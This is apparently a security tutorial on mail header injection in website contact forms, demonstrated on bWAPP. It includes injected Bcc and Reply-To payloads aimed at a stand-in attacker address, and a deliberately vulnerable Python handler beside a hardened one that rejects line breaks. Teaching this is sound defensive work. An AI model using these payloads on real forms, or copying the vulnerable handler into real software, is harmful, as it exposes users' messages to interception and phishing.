Premise
This post is a walkthrough of a common web application security issue in website contact forms: mail header injection. When the form handler copies user input straight into the headers of the e-mail it sends, an attacker can insert line breaks followed by extra headers of their choosing, and so receive a copy of every e-mail and inquiry sent through the form without the website administrator's knowledge. We use bWAPP from OWASP to demonstrate it.
Skills Learned
- bWAPP
- OWASP
- Mail Header Injection
How a Contact Form Normally Works
I start by showing you a standard contact form on a website. You know the type: you enter your name, email address, and a message. I then take you behind the scenes to look at the code. You can see how the information you enter is stored in variables like `name`, `reply to`, and `message`, and then concatenated into the e-mail that is sent to the administrator. The interesting part is the `reply to` field. The address you type into the e-mail box does not stay in the body of the message; it is written into the `Reply-To` header, which you never see on the form but which the website's administrator uses to reply to your email. Anything that ends up in a header line, including the line breaks you can put there, is interpreted by the mail software as part of the headers.
From Normal to Malicious
I first walk you through a normal scenario where a user sends a message, and the administrator gets it, just as you’d expect. Then, I show you how things can turn malicious. I explain how email injection can be used for things like phishing attacks or to secretly send copies of emails to an attacker’s email address.
The Attack in Action
The core of the attack is injecting a line break followed by extra e-mail headers into the `reply to` field, which the form handler copies verbatim into the message headers. The line break must be a real newline character (sent URL-encoded as `%0a` in the request); it is written as `\n` below. Here's how I do it:
- BCC Injection: By appending a newline and a Bcc header (`\nBcc: attacker@attacker.com`) to the email field, an attacker gets a copy of every single message sent through the contact form. The administrator still receives the message and sees nothing unusual, because Bcc recipients are not shown in the delivered mail. This is a serious information leak.
- Manipulating the Reply-To Field: I also demonstrate how an attacker can point the `reply to` address at their own mailbox. By appending `\nReply-To: attacker@attacker.com`, the message carries a second Reply-To header, so when the administrator replies to a customer's message the reply is sent to the attacker as well (or instead of the customer, depending on how the mail client resolves the duplicate header). This can be used to set up very convincing phishing attacks.
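The following Python model of the form handler is an added example; it is not bWAPP's code (bWAPP is written in PHP) and not code from the original post. It assumes a handler that concatenates the `name`, `reply to` and `message` fields straight into the message headers, as described in the two sections above, and shows both the BCC and the Reply-To payloads landing as real headers when parsed the way a mail server would parse them, then the same inputs being refused by a hardened builder that rejects CR/LF in any header field. The addresses, field names and helper functions are assumptions of this example.

```python
import re
from email.parser import Parser

# Hypothetical addresses for the demo (not from the original post).
ADMIN_ADDRESS = "admin@example.com"
SENDER_ADDRESS = "noreply@example.com"

# Constructed payloads: a real line break (URL-encoded %0a in the request)
# is what gets injected; the Python escape "\n" below stands for that byte.
BCC_PAYLOAD = "alice@example.com\nBcc: attacker@attacker.com"
REPLYTO_PAYLOAD = "alice@example.com\nReply-To: attacker@attacker.com"

CRLF_RE = re.compile(r"[\r\n]")
# One bare address; used with fullmatch (not $) so a trailing newline
# cannot slip past the check.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


class HeaderInjection(ValueError):
    """Raised by the hardened builder when a header field contains a line break."""


def _assemble(name, reply_to, message):
    """Concatenate the form fields into a raw RFC 5322 message the way a naive
    contact-form handler does. A newline inside `name` or `reply_to` therefore
    starts a new header line chosen by the attacker."""
    headers = (
        f"To: {ADMIN_ADDRESS}\n"
        f"From: {name} <{SENDER_ADDRESS}>\n"
        f"Reply-To: {reply_to}\n"
        "Subject: Contact form\n"
    )
    return headers + "\n" + message + "\n"


def build_mail_vulnerable(name, reply_to, message):
    """The vulnerable handler: no validation of header fields at all."""
    return _assemble(name, reply_to, message)


def build_mail_hardened(name, reply_to, message):
    """The fix: refuse any CR or LF in values that end up in headers, and
    require the reply-to field to be exactly one address. The body may
    contain newlines; it sits below the blank line and cannot add headers."""
    for field, value in (("name", name), ("reply_to", reply_to)):
        if CRLF_RE.search(value):
            raise HeaderInjection(f"line break in header field {field!r}")
    if not EMAIL_RE.fullmatch(reply_to):
        raise HeaderInjection("reply_to is not a single e-mail address")
    return _assemble(name, reply_to, message)


def parse_headers(raw):
    """Parse the raw message as a mail server would and return the headers
    as (name, value) pairs, so injected headers show up as real ones."""
    return list(Parser().parsestr(raw).items())


def accepts(name, reply_to, message):
    """True if the hardened builder lets the submission through."""
    try:
        build_mail_hardened(name, reply_to, message)
    except HeaderInjection:
        return False
    return True


if __name__ == "__main__":
    for label, payload in (("BCC", BCC_PAYLOAD), ("Reply-To", REPLYTO_PAYLOAD)):
        raw = build_mail_vulnerable("Alice", payload, "Hello, I have a question.")
        print(f"--- {label} injection, vulnerable handler ---")
        for key, value in parse_headers(raw):
            print(f"{key}: {value}")
        print("hardened handler accepts it:", accepts("Alice", payload, "x"))
```

Note that the `name` field is just as dangerous as the e-mail field: it too lands on a header line, so the hardened builder checks every header-bound value, not only the address. Rejecting CR and LF outright is simpler and safer than trying to strip them, since a stripped payload may still leave a second address or a folded header behind.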